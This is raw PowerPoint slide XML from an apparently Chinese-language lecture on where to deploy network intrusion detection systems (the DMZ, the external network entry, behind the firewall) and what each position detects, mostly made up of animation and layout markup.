                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="7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1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="79"/>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2" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="79"/>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par>
                          <p:cTn id="27" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="28" presetID="35" presetClass="emph" presetSubtype="0" repeatCount="3000" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:anim calcmode="discrete" valueType="str">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="80"/>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2" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="80"/>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par>
                          <p:cTn id="37" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="38" presetID="35" presetClass="emph" presetSubtype="0" repeatCount="3000" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:anim calcmode="discrete" valueType="str">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>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2" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="43"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78" grpId="2" animBg="1"/>
      <p:bldP spid="79" grpId="0" animBg="1"/>
      <p:bldP spid="79" grpId="1" animBg="1"/>
      <p:bldP spid="79" grpId="2" animBg="1"/>
      <p:bldP spid="80" grpId="0" animBg="1"/>
      <p:bldP spid="80" grpId="1" animBg="1"/>
      <p:bldP spid="80" grpId="2" animBg="1"/>
      <p:bldP spid="82" grpId="0" animBg="1"/>
      <p:bldP spid="82" grpId="1" animBg="1"/>
      <p:bldP spid="82" grpId="2"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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2207808-5FF6-4273-3366-8A11B3D5DCC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1335040" y="2270855"/>
            <a:ext cx="916059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dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>最常见的部署位置，可检测到所有针对服务器的攻击行为</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" sz="2800" b="1" dirty="0">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="43" name="组合 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03300A43-5B4B-7EDB-E412-BD8491048FFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1141451" y="3236042"/>
            <a:ext cx="1118136" cy="734063"/>
            <a:chOff x="3792538" y="3152454"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A8C3F9F-D15D-B3FF-7497-B56DF20E5252}"/>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5" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4336BCAD-DB9B-7A0A-6353-69779EA9DA31}"/>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6" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCCE99AE-0EE9-6C81-801A-82A5AAC490E7}"/>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47" name="组合 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FCD80AA-6A81-BDD0-C942-3AF530FCC56C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="955040" y="4082781"/>
            <a:ext cx="6880225" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="10835" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{722D8E04-0C2D-B185-37DF-A1CC4A1C3C5A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="989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检测已经渗入过第一层防御体系的来自外部的攻击</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="49" name="组合 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{356D418F-25B3-529A-BC97-55E46D276738}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="51" name="图片 50">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0FA0F67-2A33-5807-D596-C16BFDA8B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2" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F19E9C24-0F5E-5D41-84D6-214FC84D23BC}"/>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6" name="组合 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4244D8F-C7B8-D079-EF04-10D184928E1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="955040" y="4504447"/>
            <a:ext cx="6630670" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="10442" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17C818C2-CB7A-748B-4BFC-2852CD613FB7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="9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容易检测网络防火墙的性能并找到配置策略中的问题</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="68" name="组合 67">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{659855B3-6FAB-6174-D26B-23DB4A41F162}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="69" name="图片 68">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDF39515-8491-1A09-1247-06EC65D2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0" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54D2D86E-B043-C0DB-540A-43CCC2D6BA5B}"/>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D9C1A2AF-E70E-04C1-C51C-263D02B609DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="955040" y="4945798"/>
            <a:ext cx="5310505" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="8363" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="76" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C6900E5-E484-26C4-B3FC-2708A8B3C76D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="7418" cy="589"/>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所检测的对象集中于关键的服务设备</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="81" name="组合 80">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF54B071-77B0-8DD3-3CD7-E01AA6FCC9C1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="86" name="图片 85">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5A48C8C-8A03-9D80-1BB7-58A988233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1" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98097AFD-0CA0-15FB-4A66-4D8A0FF1F86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95" name="组合 94">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC470D3A-584F-DF04-1577-E8D417F9D7A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="932246" y="5415982"/>
            <a:ext cx="9467850" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="14910" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="96" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD46F9E9-64B6-6AD8-D21D-AA1CA145037D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="1396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即使进入的攻击行为不可识别，也可以从被攻击主机的反馈中获得受到攻击的信息</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="97" name="组合 96">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B971E056-AF31-D9F7-2286-C61F2E1C9B95}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="98" name="图片 97">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F122FD3-0736-16C1-BCE0-6C295890C7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9" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2390BAA-1F6F-A943-ED97-75C5467B7B6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sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{458EEB9D-F745-41A6-875D-956477C61A5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3.1 NIDS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32" name="组合 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F8F0D18-33FE-4561-841F-D73115F9CE45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="1260000"/>
            <a:ext cx="4320000" cy="720000"/>
            <a:chOff x="3792538" y="3138472"/>
            <a:chExt cx="1213959" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE12B9F9-137E-4111-87AA-EF8627123D71}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3792538" y="3138472"/>
              <a:ext cx="1213959"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34" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92F56A06-D648-483C-B951-D7FA88A243F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35" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72D898EC-1C92-48D3-81E7-6D0D23C5B27D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3860800" y="3293024"/>
              <a:ext cx="1031865" cy="47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的部署</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>——DMZ</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>区</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1824447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D7A6DB2C-88FB-3808-A74A-B08CD060E3F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="1260000"/>
            <a:ext cx="4320000" cy="720000"/>
            <a:chOff x="3792538" y="3138472"/>
            <a:chExt cx="1213959" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="72" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{698EB868-5B1B-E8BB-EB34-4A5483C7B4D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3792538" y="3138472"/>
              <a:ext cx="1213959"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3" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E39EF1C4-9A3B-2A81-427E-0689AB2B3E0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4" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37684E28-920E-9778-4559-882227F6DF46}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3860800" y="3293024"/>
              <a:ext cx="1031865" cy="47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的部署</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外网入口</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2207808-5FF6-4273-3366-8A11B3D5DCC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1335040" y="2270855"/>
            <a:ext cx="916059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dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>检测所有进出防火墙外网口的数据</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" b="1" dirty="0">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="43" name="组合 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03300A43-5B4B-7EDB-E412-BD8491048FFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1141451" y="3236042"/>
            <a:ext cx="1118136" cy="734063"/>
            <a:chOff x="3792538" y="3152454"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A8C3F9F-D15D-B3FF-7497-B56DF20E5252}"/>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5" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4336BCAD-DB9B-7A0A-6353-69779EA9DA31}"/>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6" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCCE99AE-0EE9-6C81-801A-82A5AAC490E7}"/>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47" name="组合 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FCD80AA-6A81-BDD0-C942-3AF530FCC56C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="955040" y="4082781"/>
            <a:ext cx="6880225" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="10835" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{722D8E04-0C2D-B185-37DF-A1CC4A1C3C5A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="989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可以记录最为原始的攻击数据包</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="49" name="组合 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{356D418F-25B3-529A-BC97-55E46D276738}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
